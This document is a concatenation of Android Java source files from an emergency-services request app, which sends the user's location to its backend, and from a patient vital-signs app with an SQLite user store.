import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.List;
import java.util.Locale;
import static android.location.LocationManager.*;
public class MainActivity extends AppCompatActivity {
private Button hospital_button;
private Button fire_button;
private ImageButton profile_button;
private LocationManager lm;
private LocationListener ll;
private Location curr_loc;
@Override
protected void onCreate(Bundle savedInstanceState) { // first method which it loads
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
hospital_button = findViewById(R.id.hospital_id);
fire_button = findViewById(R.id.fire_id);
lm = (LocationManager) getSystemService(LOCATION_SERVICE);
ll = new LocationListener() {
@Override
public void onLocationChanged(Location location) {
Log.d("Latitude_Longitude ","Data from the Latitude_Longitude : " + location.getLatitude());
System.out.println("\nLatitude_Longitude " + location.getLatitude() + " " + location.getLongitude());
curr_loc = location;
}
@Override
public void onStatusChanged(String provider, int status, Bundle extras) {
}
@Override
public void onProviderEnabled(String provider) {
}
@Override
public void onProviderDisabled(String provider) {
//What to do if GPS is off
Intent i = new Intent(Settings.ACTION_LOCATION_SOURCE_SETTINGS);
startActivity(i);
}
};
configureButton();
profile_button = findViewById(R.id.profile_page_id);
// profile_button.setOnClickListener(new View.OnClickListener() {
// @Override
// public void onClick(View v) {
// openProfileActivity();
// }
// });
}
@Override
public void onRequestPermissionsResult(int requestCode, @NonNull String[] permissions, @NonNull int[] grantResults) {
switch (requestCode) {
case 10:
if (grantResults.length > 0 && grantResults[0] == PackageManager.PERMISSION_GRANTED)
configureButton();
return;
}
}
private void configureButton() {
hospital_button.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
if (checkSelfPermission(Manifest.permission.ACCESS_FINE_LOCATION) != PackageManager.PERMISSION_GRANTED && checkSelfPermission(Manifest.permission.ACCESS_COARSE_LOCATION) != PackageManager.PERMISSION_GRANTED) {
requestPermissions(new String[]{Manifest.permission.ACCESS_COARSE_LOCATION,Manifest.permission.ACCESS_FINE_LOCATION,Manifest.permission.INTERNET},
10);
return;
}
}
lm.requestLocationUpdates(LocationManager.GPS_PROVIDER, 1000, 0, ll);
lm.requestLocationUpdates(LocationManager.NETWORK_PROVIDER, 0, 0, ll);
if (curr_loc != null){
getService("Hospital");
}
else
System.out.println("Location fetching is slow");
}
});
fire_button.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
if (checkSelfPermission(Manifest.permission.ACCESS_FINE_LOCATION) != PackageManager.PERMISSION_GRANTED && checkSelfPermission(Manifest.permission.ACCESS_COARSE_LOCATION) != PackageManager.PERMISSION_GRANTED) {
requestPermissions(new String[]{Manifest.permission.ACCESS_COARSE_LOCATION,Manifest.permission.ACCESS_FINE_LOCATION,Manifest.permission.INTERNET}
,10);
return;
}
}
lm.requestLocationUpdates(GPS_PROVIDER, 1000, 0, ll);
if (curr_loc != null){
getService("Fire");
}
else
System.out.println("Location fetching is slow");
}
});
}
public String getAddress(double lat, double lng) {
Geocoder geocoder = new Geocoder(MainActivity.this, Locale.getDefault());
try {
List<Address> addresses = geocoder.getFromLocation(lat, lng, 1);
Address obj = addresses.get(0);
String add = obj.getAddressLine(0);
// add = add + "," + obj.getCountryName();
// add = add + "," + obj.getCountryCode();
// add = add + "," + obj.getAdminArea();
// add = add + "," + obj.getPostalCode();
// add = add + "," + obj.getSubAdminArea();
// add = add + "," + obj.getLocality();
// add = add + "," + obj.getSubThoroughfare();
// getAdminArea(): returns the state acronym ("CA", for California)
// getCountryCode(): returns the country ISO code ("JP", for Japan)
// getCountryName(): returns country name ("Spain", for... Spain)
// getFeatureName(): returns the name of the location, if any ("Louvre", for the museum)
// getLocality(): returns the city name ("London")
// getPostalCode(): returns the postal code ("94110", in the US)
// getPremises(): ???
// getSubAdminArea(): ???
// getSubLocality(): ???
// getSubThoroughfare(): ???
// getThoroughfare(): returns the street and building number ("1600 Amphitheater Parkway")
Log.d("IGA", "Address" + add);
System.out.println("Address => "+add);
return add;
} catch (IOException e) {
e.printStackTrace();
}
return "Address Not Found";
}
public MainActivity.MainConnect mc;
public void getService(String type){
SharedPreferences sp;
sp = getSharedPreferences("login",MODE_PRIVATE);
System.out.println(curr_loc.getLatitude());
System.out.println(curr_loc.getLongitude());
String latitude_local = String.format("%f",curr_loc.getLatitude());
String longitude_local = String.format("%f",curr_loc.getLongitude());
String username_local = sp.getString("UserName",null);
String address_local = getAddress(Double.parseDouble(latitude_local),Double.parseDouble(longitude_local));
System.out.println("Entered!!");
if(username_local==null){
Toast.makeText(MainActivity.this,"Please login!",Toast.LENGTH_LONG).show();
gotoLogin();
}
else{
mc = new MainActivity.MainConnect(latitude_local,longitude_local,username_local,type,address_local);
mc.execute();
}
}
public class MainConnect extends AsyncTask<String,String,String> {
private String latitude_local,longitude_local,username_local,type,address_local;
MainConnect(String lat,String lon,String un,String t,String a){
latitude_local = lat;
longitude_local = lon;
username_local = un;
type = t;
address_local = a;
}
@Override
protected String doInBackground(String... params){
String res = null;
JSONObject jsonObject = null;
try{
System.out.println("Entered background!!");
String ip = "172.16.101.50";
// 192.168.43.183 - Manonmaie
// 192.168.43.105 - Soumya
// 172.16.145.218 - Milan
jsonObject = new JSONObject();
jsonObject.put("Latitude", latitude_local);
jsonObject.put("Longitude", longitude_local);
jsonObject.put("Name",username_local);
jsonObject.put("Type",type);
jsonObject.put("Address",address_local);
String serverURL="http://"+ip+":8080/EmergencyServicesBackend/webapi/resource/get_service";
URL url = new URL(serverURL);
HttpURLConnection connection = (HttpURLConnection)url.openConnection();
connection.setRequestMethod("POST");
//connection.setRequestProperty("Content-Type", "application/json; charset=UTF-8");
connection.setRequestProperty("Content-Type", "text/plain; charset=UTF-8");
connection.setDoOutput(true);
OutputStream os = connection.getOutputStream();
os.write(jsonObject.toString().getBytes("UTF-8"));
os.close();
int responseCode = connection.getResponseCode();
Log.d("Code", "ResponseCode: " + responseCode);
InputStream is = connection.getInputStream();
BufferedReader r = new BufferedReader(new InputStreamReader(is));
StringBuilder total = new StringBuilder();
String line;
while ((line = r.readLine()) != null)
{
total.append(line);
}
is.close();
line = total.toString();
line = line.trim();
Log.d("MainActivity","Data from the Server: " + line);
res = line;
return res;
}
catch(MalformedURLException e){
e.printStackTrace();
}
catch (IOException e){
e.printStackTrace();
}
catch (Exception e){
e.printStackTrace();
}
return null;
}
@Override
protected void onPostExecute(String s) {
if(s == null)
{
Log.d("MainActivity", "Some error has occurred at Server");
}
else if(s.equals("username or type is null"))
{
Log.e("MainActivity", "username or type is null");
Toast.makeText(MainActivity.this,"username or type is null",Toast.LENGTH_LONG).show();
}
else if(s.equals("No username found"))
{
Log.e("MainActivity", "No username found" );
Toast.makeText(MainActivity.this,"No username found",Toast.LENGTH_LONG).show();
}
else if(s.equals("Address not found")){
Log.e("MainActivity", "Address not found" );
Toast.makeText(MainActivity.this,"Address not found",Toast.LENGTH_LONG).show();
}
else if(s.equals("No requests of you")){
Log.e("MainActivity", "No requests of you" );
Toast.makeText(MainActivity.this,"Some error occured. Try again!!",Toast.LENGTH_LONG).show();
}
else
{
Log.d("MainActivity", "Request sent");
Intent intent = new Intent(MainActivity.this, SearchingActivity.class);
intent.putExtra("request_id",s);
// Bundle basket= new Bundle();
// basket.putString("UserName",username_local);
// intent.putExtras(basket);
startActivity(intent);
// finish();
}
}
@Override
protected void onCancelled() {
mc = null;
}
}
public void gotoLogin(){
Intent intent = new Intent(this,LoginActivity.class);
startActivity(intent);
}
public void openProfileActivity(){
Intent intent = new Intent(this,Profile.class);
startActivity(intent);
}
}
<file_sep>package com.example.emergencyservices;
import androidx.appcompat.app.AppCompatActivity;
import android.os.AsyncTask;
import android.os.Bundle;
import android.util.Log;
import android.widget.TextView;
import android.widget.Toast;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
/**
 * Detail screen showing a service provider's name, address and phone number,
 * fetched from the backend using the "Service_id" Intent extra.
 */
public class Requests_serviceproviderDetailsActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_requests_serviceprovider_details);
        String id = getIntent().getStringExtra("Service_id");
        // Fix: the original crashed with NullPointerException /
        // NumberFormatException when the extra was missing or malformed.
        if (id == null) {
            Log.e("Request_detailsActivity", "Missing Service_id extra");
            finish();
            return;
        }
        int service_id;
        try {
            service_id = Integer.parseInt(id);
        } catch (NumberFormatException e) {
            Log.e("Request_detailsActivity", "Bad Service_id extra: " + id);
            finish();
            return;
        }
        GetServiceRequestsDetails(service_id);
    }

    // Handle to the in-flight details-fetch task (nulled in onCancelled).
    public GetServiceRequestsDetailsConnect gc;

    /** Launches a background fetch of the provider's details. */
    public void GetServiceRequestsDetails(int uid){
        gc = new GetServiceRequestsDetailsConnect(uid);
        gc.execute();
    }

    /**
     * Background task that GETs the provider's details (address, name, phone)
     * and fills the detail views. doInBackground returns the raw JSON body,
     * or null on failure.
     */
    public class GetServiceRequestsDetailsConnect extends AsyncTask<String,String,String> {
        String address_local,name_local,phno_local;
        int user_id;

        GetServiceRequestsDetailsConnect(int uid){
            user_id=uid;
        }

        @Override
        protected String doInBackground(String... params){
            HttpURLConnection connection = null;
            BufferedReader reader = null;
            try{
                // NOTE(review): backend address is hard-coded; consider a
                // single shared configuration value.
                String ip = "172.16.101.50";
                String serverURL = "http://"+ip+":8080/EmergencyServicesBackend/webapi/resource/get_servicedetails/"+user_id;
                URL url = new URL(serverURL);
                connection = (HttpURLConnection) url.openConnection();
                connection.setRequestMethod("GET");
                connection.setRequestProperty("Content-Type", "text/plain; charset=UTF-8");
                InputStream is = connection.getInputStream();
                reader = new BufferedReader(new InputStreamReader(is));
                StringBuilder total = new StringBuilder();
                String line;
                while ((line = reader.readLine()) != null)
                {
                    total.append(line);
                }
                line = total.toString().trim();
                System.out.println("line = "+line);
                JSONObject jsonObj = new JSONObject(line);
                address_local = jsonObj.getString("address");
                name_local = jsonObj.getString("name");
                phno_local = jsonObj.getString("phno");
                return line;
            }
            catch(MalformedURLException e){
                e.printStackTrace();
            }
            catch (IOException e){
                e.printStackTrace();
            }
            catch (Exception e){
                e.printStackTrace();
            }
            finally {
                // Fix: the original leaked the reader and connection on every
                // exception path.
                if (reader != null) {
                    try {
                        reader.close();
                    } catch (IOException ignored) {
                    }
                }
                if (connection != null) {
                    connection.disconnect();
                }
            }
            return null;
        }

        @Override
        protected void onPostExecute(String s) {
            if(s==null){
                Log.d("Request_detailsActivity", "Some error has occurred at Server or connection error");
            }
            else if(s.equals("invalid") || s.equals("user_id is becoming -1")){
                Log.e("Request_detailsActivity", "Request cancelled");
                Toast.makeText(Requests_serviceproviderDetailsActivity.this,"Request cancelled",Toast.LENGTH_LONG).show();
            }
            else if(s.equals("Exception")){
                Log.e("Request_detailsActivity", "Some error has occurred at Server");
                Toast.makeText(Requests_serviceproviderDetailsActivity.this,"Some error has occurred at Server",Toast.LENGTH_LONG).show();
            }
            else
            {
                // Success: append the fetched values after the static labels.
                TextView nameText = (TextView) findViewById(R.id.name_serviceprovider_id);
                nameText.append(" "+name_local);
                TextView addressText = (TextView) findViewById(R.id.address_id);
                addressText.append(address_local);
                TextView phnoText = (TextView) findViewById(R.id.phno_serviceprovider_id);
                phnoText.append(" "+phno_local);
                Log.d("Request_detailsActivity", "Request Succesful");
            }
        }

        @Override
        protected void onCancelled() {
            gc = null;
        }
    }
}
<file_sep>include ':app', ':mysql-connector-java-5.1.45'
rootProject.name='EmergencyServices'
| f3b1e92f565e8511a17d34f2df780922ce77624a | [
"Java",
"Gradle"
] | 6 | Java | Manonmaie/EmergencyServices | 42a2542ddc6e9fd61b2b2219e7080385bd1b3cc7 | 6efaaadedf505285edd8e4eebe112b911fb746aa |
refs/heads/master | <repo_name>relwalter/Patient<file_sep>/app/src/main/java/com/patient/AboutUsActivity.java
package com.patient;
import android.content.Intent;
import android.net.Uri;
import android.support.v7.app.ActionBar;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.MenuItem;
import android.view.View;
import android.widget.TextView;
/**
 * "About us" screen: shows a project URL label that opens the browser when
 * tapped, and a home-as-up action bar button that closes the screen.
 */
public class AboutUsActivity extends AppCompatActivity {
    private TextView mTextView;   // label carrying the project URL
    private String uriString;     // normalized https URL built from the label

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_about_us);
        ActionBar actionBar=getSupportActionBar();
        actionBar.setDisplayHomeAsUpEnabled(true);
        mTextView=(TextView) findViewById(R.id.go_github);
        mTextView.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                Intent intent=new Intent();
                intent.setAction(Intent.ACTION_VIEW);
                // Normalize whatever scheme the label carries to https.
                // Fix: the original split("//")[1] threw
                // ArrayIndexOutOfBoundsException when the label had no "//"
                // and truncated any path containing a second "//".
                String text = mTextView.getText().toString();
                int sep = text.indexOf("//");
                String hostPart = (sep >= 0) ? text.substring(sep + 2) : text;
                uriString = "https://" + hostPart;
                intent.setData(Uri.parse(uriString));
                startActivity(intent);
            }
        });
    }

    @Override
    public boolean onOptionsItemSelected(MenuItem item) {
        switch (item.getItemId()) {
            case android.R.id.home:{
                // Up button closes the screen.
                finish();
                break;
            }
        }
        return super.onOptionsItemSelected(item);
    }
}
<file_sep>/app/src/main/java/com/patient/PatinetSignActivity.java
package com.patient;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.support.design.widget.FloatingActionButton;
import android.support.v7.app.AppCompatActivity;
import android.support.v7.widget.Toolbar;
import android.text.TextUtils;
import android.util.Log;
import android.view.MenuItem;
import android.view.View;
import android.widget.EditText;
import android.widget.ImageView;
import android.widget.TextView;
import android.widget.Toast;
import com.patient.framework.model.Patient;
import com.patient.framework.model.PatientSign;
import com.patient.framework.model.User;
import com.patient.framework.repository.PatientRepository;
import com.patient.framework.repository.PatientSignRepository;
import com.patient.framework.repository.UserRepository;
import java.util.regex.Pattern;
public class PatinetSignActivity extends AppCompatActivity {
// Patient id read from the "current" SharedPreferences; selects whose signs are shown.
int pid;
// Cached vital-sign values (as display strings) for the current patient.
private String currentRealName,currentHeight,currentWeight,currentTemp,currentBreath,currentPulse,
currentPressure,currentBlsugar,currentMore;
// Read-only display widgets (plus mNameEditView, the name label on the edit screen).
private TextView mrealNameView,mNameEditView,mHeightView,mWeightView,mTempView,mBreathView,mPulseView,
mPressureView,mBlsugarView,mMoreView;
// NOTE(review): mImageView is never assigned or used in the visible code — confirm before removing.
private ImageView mImageView;
// Editable inputs on the sign-edit screen.
private EditText mHeightEditView,mWeightEditView,mTempEditView,mBreathEditView,mPulseEditView,
mPressureEditView,mBlsugarEditView,mMoreEditView;
// FABs: 'fab' switches to edit mode, 'fab_edit' saves the edits.
private FloatingActionButton fab,fab_edit;
// Data access for the patient's recorded signs.
private PatientSignRepository patientSignRepository;
private PatientSign patientSign;
private SharedPreferences sharedPreferences;
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    // Open the sign repository and resolve which patient we are showing.
    patientSignRepository = new PatientSignRepository(PatinetSignActivity.this);
    sharedPreferences = getSharedPreferences("current", MODE_PRIVATE);
    pid = sharedPreferences.getInt("pid", 0);
    // Start on the read-only view of the patient's vital signs.
    loadPatientSignView();
}
/**
 * Switches to the read-only vital-signs layout, fills it from the database,
 * and wires the FAB to open the edit layout.
 */
private void loadPatientSignView(){
    setContentView(R.layout.activity_patient_sign);
    // Bind the read-only display widgets (must happen after setContentView).
    mrealNameView=(TextView) findViewById(R.id.realname_sign);
    mHeightView=(TextView) findViewById(R.id.height_sign);
    mWeightView=(TextView) findViewById(R.id.weight_sign);
    mTempView=(TextView) findViewById(R.id.temp_sign);
    mBreathView=(TextView) findViewById(R.id.breath_sign);
    mPulseView=(TextView) findViewById(R.id.pulse_sign);
    mPressureView=(TextView) findViewById(R.id.pressure_sign);
    mBlsugarView=(TextView) findViewById(R.id.blsugar_sign);
    mMoreView=(TextView) findViewById(R.id.more_sign);
    // Populate the widgets with the values stored for this patient.
    setPatientSignView();
    Toolbar toolbar=(Toolbar) findViewById(R.id.toolbar_sign);
    setSupportActionBar(toolbar);
    getSupportActionBar().setDisplayHomeAsUpEnabled(true);
    // The floating action button flips the screen into edit mode.
    fab = (FloatingActionButton) findViewById(R.id.fab3);
    fab.setOnClickListener(new View.OnClickListener() {
        @Override
        public void onClick(View view) {
            loadPatientSignEditView();
        }
    });
}
/**
 * Switches to the editable vital-signs layout, pre-fills it with the stored
 * values, and wires the FAB to persist the changes.
 */
private void loadPatientSignEditView(){
    setContentView(R.layout.activity_patient_sign_edit);
    // Bind and pre-fill the edit widgets (must happen after setContentView).
    setPatientSignEditView();
    Toolbar toolbar=(Toolbar) findViewById(R.id.toolbar_sign_edit);
    setSupportActionBar(toolbar);
    getSupportActionBar().setDisplayHomeAsUpEnabled(true);
    fab_edit = (FloatingActionButton) findViewById(R.id.fab_sign_edit);
    fab_edit.setOnClickListener(new View.OnClickListener() {
        @Override
        public void onClick(View v) {
            // Persist the form; on success fall back to the read-only view.
            if(savePatientSign()){
                Toast.makeText(PatinetSignActivity.this,"资料更新成功",Toast.LENGTH_SHORT)
                        .show();
                loadPatientSignView();
            }else{
                Toast.makeText(PatinetSignActivity.this,
                        "资料更新失败,请检查后重试",Toast.LENGTH_SHORT).show();
            }
        }
    });
}
@Override
public boolean onOptionsItemSelected(MenuItem item) {
    // The only menu action handled here is the action-bar Up button.
    if (item.getItemId() == android.R.id.home) {
        finish();
    }
    return super.onOptionsItemSelected(item);
}
/** Copies the cached vital-sign strings into the read-only display widgets. */
private void setPatientSignView() {
    autowireFromDB();
    // Targets and values are kept in matching order and applied pairwise.
    TextView[] targets = {
            mrealNameView, mHeightView, mWeightView, mTempView, mBreathView,
            mPulseView, mPressureView, mBlsugarView, mMoreView,
    };
    String[] values = {
            currentRealName, currentHeight, currentWeight, currentTemp, currentBreath,
            currentPulse, currentPressure, currentBlsugar, currentMore,
    };
    for (int i = 0; i < targets.length; i++) {
        targets[i].setText(values[i]);
    }
}
private void setPatientSignEditView(){
autowireFromDB();
mNameEditView=(TextView) findViewById(R.id.realname_sign_edit);
mHeightEditView=(EditText) findViewById(R.id.height_sign_edit);
mWeightEditView=(EditText) findViewById(R.id.weight_sign_edit);
mTempEditView=(EditText) findViewById(R.id.temp_sign_edit);
mBreathEditView=(EditText) findViewById(R.id.breath_sign_edit);
mPulseEditView=(EditText) findViewById(R.id.pulse_sign_edit);
mPressureEditView=(EditText) findViewById(R.id.pressure_sign_edit);
mBlsugarEditView=(EditText) findViewById(R.id.blsugar_sign_edit);
mMoreEditView=(EditText) findViewById(R.id.more_sign_edit);
mNameEditView.setText(currentRealName);
mHeightEditView.setText(currentHeight);
mWeightEditView.setText(currentWeight);
mTempEditView.setText(currentTemp);
mBreathEditView.setText(currentBreath);
mPulseEditView.setText(currentPulse);
mPressureEditView.setText(currentPressure);
mBlsugarEditView.setText(currentBlsugar);
mMoreEditView.setText(currentMore);
}
private void autowireFromDB(){
patientSign=patientSignRepository.getPatientSign(pid);
String[] patientSignInfo;
if(patientSign==null){
patientSignInfo=new String[]{"无","无","无","无","无","无","无","无","无","无"};
Toast.makeText(PatinetSignActivity.this,"您还没有录入任何体征信息",Toast.LENGTH_SHORT)
.show();
}else{
patientSignInfo=patientSign.getInfo();
}
currentRealName=sharedPreferences.getString("name","");
currentHeight=patientSignInfo[2];
currentWeight=patientSignInfo[3];
currentTemp=patientSignInfo[4];
currentBreath=patientSignInfo[5];
currentPulse=patientSignInfo[6];
currentPressure=patientSignInfo[7];
currentBlsugar=patientSignInfo[8];
currentMore=patientSignInfo[9];
}
private void autowireFromText(){
currentHeight=mHeightEditView.getText().toString();
currentWeight=mWeightEditView.getText().toString();
currentTemp=mTempEditView.getText().toString();
currentBreath=mBreathEditView.getText().toString();
currentPulse=mPulseEditView.getText().toString();
currentPressure=mPressureEditView.getText().toString();
currentBlsugar=mBlsugarEditView.getText().toString();
currentMore=mMoreEditView.getText().toString();
}
private boolean savePatientSign() {
autowireFromText();
if(attemptSave()){
patientSign=new PatientSign(pid,Float.parseFloat(currentHeight),Float.parseFloat(currentWeight),
Float.parseFloat(currentTemp),Float.parseFloat(currentBreath),
Float.parseFloat(currentPulse), currentPressure,Float.parseFloat(currentBlsugar),
currentMore);
if (!patientSignRepository.checkPatientSign(pid)) {
Log.d("pid",Integer.toString(pid));
if (patientSignRepository.addPatientSignSign(patientSign)==1) {
return true;
}
} else if (patientSignRepository.updatePatientSignSign(patientSign)) {
return true;
}
}
return false;
}
private boolean attemptSave(){
boolean cancel = false;
View focusView = null;
Pattern pattern = Pattern.compile("^[+]{0,1}(\\d+)$|^[+]{0,1}(\\d+\\.\\d+)$");
if (TextUtils.isEmpty(currentHeight)||!pattern.matcher(currentHeight).matches()) {
mHeightEditView.setError("身高格式不正确");
focusView = mHeightEditView;
cancel = true;
}
if (TextUtils.isEmpty(currentWeight)||!pattern.matcher(currentWeight).matches()) {
mWeightEditView.setError("体重格式不正确");
focusView = mWeightEditView;
cancel = true;
}
if(TextUtils.isEmpty(currentTemp)||!pattern.matcher(currentTemp).matches()){
mTempEditView.setError("体温格式不正确");
focusView = mTempEditView;
cancel = true;
}else if (!(Float.parseFloat(currentTemp)>=34 && Float.parseFloat(currentTemp)<=42)){
mTempEditView.setError("温度输入有误");
focusView = mTempEditView;
cancel = true;
}
if(TextUtils.isEmpty(currentBreath)||!pattern.matcher(currentBreath).matches()){
mBreathEditView.setError("格式不正确");
focusView = mBreathEditView;
cancel = true;
}else if (!(Float.parseFloat(currentBreath)>=10 && Float.parseFloat(currentBreath)<=150)){
mBreathEditView.setError("呼吸频率有误");
focusView = mBreathEditView;
cancel = true;
}
if(TextUtils.isEmpty(currentPulse)||!pattern.matcher(currentPulse).matches()){
mPulseEditView.setError("脉搏格式不正确");
focusView = mPulseEditView;
cancel = true;
}else if (!(Float.parseFloat(currentPulse)>=10 && Float.parseFloat(currentPulse)<=150)){
mPulseEditView.setError("脉搏输入有误");
focusView = mPulseEditView;
cancel = true;
}
if(TextUtils.isEmpty(currentBlsugar)||!pattern.matcher(currentBlsugar).matches()){
mBlsugarEditView.setError("血糖浓度格式不正确");
focusView = mBlsugarEditView;
cancel = true;
}else if (!(Float.parseFloat(currentBlsugar)>=2 && Float.parseFloat(currentBlsugar)<=15)){
mBlsugarEditView.setError("血糖浓度有误");
focusView = mBlsugarEditView;
cancel = true;
}
if (!currentPressure.contains("/")) {
mPressureEditView.setError("血压格式有误");
focusView = mPressureEditView;
cancel = true;
}else {
if(TextUtils.isEmpty(currentPressure.split("/")[0])
||TextUtils.isEmpty(currentPressure.split("/")[1])){
mPressureEditView.setError("血压输入有误");
focusView = mPressureEditView;
cancel = true;
}else {
if(!pattern.matcher(currentPressure.split("/")[0]).matches()
||!pattern.matcher(currentPressure.split("/")[1]).matches()) {
mPressureEditView.setError("血压格式有误");
focusView = mPressureEditView;
cancel = true;
}else {
float relPress=Float.parseFloat(currentPressure.split("/")[0]);
float shrPress=Float.parseFloat(currentPressure.split("/")[1]);
if(!(relPress>=10 && relPress<=200)||!(shrPress>=10 && shrPress<=200)){
mPressureEditView.setError("血压输入有误");
focusView = mPressureEditView;
cancel = true;
}
}
}
}
if (cancel) {
focusView.requestFocus();
return false;
}else {
return true;
}
}
}
<file_sep>/app/src/main/java/com/patient/FullscreenActivity.java
package com.patient;
import android.content.Intent;
import android.support.v7.app.ActionBar;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.TextView;
import org.w3c.dom.Text;
public class FullscreenActivity extends AppCompatActivity {
private View mContentView;
private TextView mTextView;
private long endTime;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_fullscreen);
hide();
mContentView = findViewById(R.id.fullscreen_content);
mTextView = (TextView) findViewById(R.id.fullscreen_content_text);
mContentView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
startActivity(new Intent(FullscreenActivity.this,LoginActivity.class));
finish();
}
});
endTime=System.currentTimeMillis()+3000;
do{
mTextView.setText(Long.toString(Math.round(endTime/1000)));
}while(System.currentTimeMillis()<=endTime);
}
private void hide() {
// Hide UI first
ActionBar actionBar = getSupportActionBar();
if (actionBar != null) {
actionBar.hide();
}
}
}
<file_sep>/app/src/main/java/com/patient/framework/repository/UserRepository.java
package com.patient.framework.repository;
import android.content.Context;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.util.Log;
import com.patient.framework.model.User;
import com.patient.framework.service.DBConnector;
import java.util.ArrayList;
import java.util.List;
public class UserRepository {
private static UserRepository userRepository;
private SQLiteDatabase db;
public UserRepository(Context context){
DBConnector connector=new DBConnector(context);
db=connector.getWritableDatabase();
}
public synchronized static UserRepository getInstance(Context context) {
if (userRepository == null) {
userRepository = new UserRepository(context);
}
return userRepository;
}
public boolean checkUser(User user){
if(user!=null) {
Cursor cursor = db.rawQuery("SELECT * FROM user WHERE eml=?", new String[]{user.getEml()});
if (cursor.getCount() > 0) {
cursor.close();
return true;
}
}
return false;
}
public int addUser(User user){
if(user!=null){
Cursor cursor=db.rawQuery("SELECT * FROM user WHERE eml=?",new String[]{user.getEml()});
if (cursor.getCount()>0){
cursor.close();
return -1;
}else{
cursor.close();
try{
db.execSQL("INSERT INTO user(card,eml,psw,phone) values(?,?,?,?)",user.getAll());
return 1;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
return 0;
}
}
}else{
return 0;
}
}
public int isValid(User user){
Cursor cursor1 = db.rawQuery("SELECT * FROM user WHERE eml=?",new String[]{user.getEml()});
if(cursor1.getCount()>0){
cursor1.close();
Cursor cursor2 = db.rawQuery("SELECT * FROM user WHERE eml=? AND psw=?",new String[]{user.getEml(),user.getPsw()});
if(cursor2.getCount()>0){
cursor2.close();
return 1;
}else{
cursor2.close();
return 0;
}
}else{
cursor1.close();
return -1;
}
}
public boolean updateUserInfo(User user){
try{
db.execSQL("UPDATE user SET card=?,phone=? WHERE eml=?",
new String[]{user.getCard(),user.getPhone(),user.getEml()});
return true;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
return false;
}
}
public boolean updateUserPsw(User user,String newPsw){
try{
db.execSQL("UPDATE user SET psw=? WHERE eml=? AND psw=?",new String[]{newPsw,user.getEml(),user.getPsw()});
return true;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
return false;
}
}
public int resetUserPsw(User user){
Cursor cursor =db.rawQuery("SELECT * FROM user WHERE eml=? AND card=?",new String[]{user.getEml(),user.getCard()});
if(cursor.getCount()>0){
cursor.close();
try{
db.execSQL("UPDATE user SET psw=? WHERE eml=?",new String[]{user.getPsw(),user.getEml()});
return 1;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
return 0;
}
}else{
return -1;
}
}
public boolean deleteUser(User user){
try{
db.execSQL("DELETE FROM user WHERE eml=? AND psw=?",new String[]{user.getEml(),user.getPsw()});
return true;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
return false;
}
}
public User getUser(String eml){
Cursor cursor =db.rawQuery("SELECT * FROM user WHERE eml=?",new String[]{eml});
if(cursor.getCount()>0){
cursor.moveToFirst();
return new User(cursor.getInt(0),cursor.getString(1),cursor.getString(2),cursor.getString(3),cursor.getString(4));
}else{
cursor.close();
return null;
}
}
}
<file_sep>/app/src/main/java/com/patient/Main2Activity.java
package com.patient;
import android.content.*;
import android.net.Uri;
import android.os.Bundle;
import android.os.Environment;
import android.os.Handler;
import android.support.v4.view.ViewPager;
import android.util.Log;
import android.view.*;
import android.support.design.widget.NavigationView;
import android.support.v4.view.GravityCompat;
import android.support.v4.widget.DrawerLayout;
import android.support.v7.app.ActionBarDrawerToggle;
import android.support.v7.app.AppCompatActivity;
import android.support.v7.app.AlertDialog;
import android.support.v7.widget.Toolbar;
import android.widget.*;
import com.patient.framework.repository.PatientRepository;
import com.patient.framework.utils.SaveDrawable;
import com.patient.framework.utils.Smoother;
import java.io.File;
public class Main2Activity extends AppCompatActivity
implements NavigationView.OnNavigationItemSelectedListener,View.OnClickListener,
CompoundButton.OnCheckedChangeListener {
private long exitTime=0L;
private DrawerLayout drawer;
private ViewPager mViewPager;
private CardPagerAdapter mCardAdapter;
private ShadowTransformer mCardShadowTransformer;
private NavigationView navigationView;
private TextView mNameTextView,mEmlTextView;
private ImageView mImageView;
private PatientRepository patientRepository;
private static Context context;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main2);
context=Main2Activity.this;
patientRepository=new PatientRepository(Main2Activity.this);
String eml=getSharedPreferences("current",MODE_PRIVATE).getString("eml","");
String card=getSharedPreferences("current",MODE_PRIVATE).getString("card","");
int imageSource=getSharedPreferences("current",MODE_PRIVATE).getInt("avatar",R.drawable.user_young);
String name=patientRepository.getPatient(card).getName();
navigationView=(NavigationView)findViewById(R.id.nav_view);
View headerView=navigationView.getHeaderView(0);
mImageView=(ImageView)headerView.findViewById(R.id.imageView);
mImageView.setImageResource(imageSource);
mImageView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
startActivity(new Intent(Main2Activity.this,ProfileActivity.class));
}
});
mNameTextView=(TextView)headerView.findViewById(R.id.name_drawer);
mEmlTextView=(TextView)headerView.findViewById(R.id.eml_drawer);
mNameTextView.setText(name);
